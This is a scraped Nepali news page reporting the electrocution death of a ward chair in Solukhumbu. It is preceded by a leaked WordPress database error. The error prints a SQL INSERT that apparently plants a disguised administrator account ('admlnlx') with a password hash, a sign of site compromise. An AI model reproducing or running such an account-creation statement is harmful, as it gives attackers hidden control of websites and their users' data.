WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNU5p3uJ9BNQk8mnMrjb2B9gS/7p651', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 15:53:54', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुखुम्बु जिल्लाको माप्य दुधकाेशी गाउँपालिका वडा नम्बर ५ का वडाध्यक्ष निमराज तामाङकाे करेन्ट लागेर मृत्यु भएकाे छ । गाउँपालिका प्रबक्ता तेज बहादुर मगरका अनुसार सदरमुकाम सल्लेरी स्थित घरमा करेन्ट लागेर उचारमा जिल्ला अस्पताल फाप्लु लानेक्रममा निधन भएकाे हाे । थप विवरण आउन बाँकी रहेकोछ ।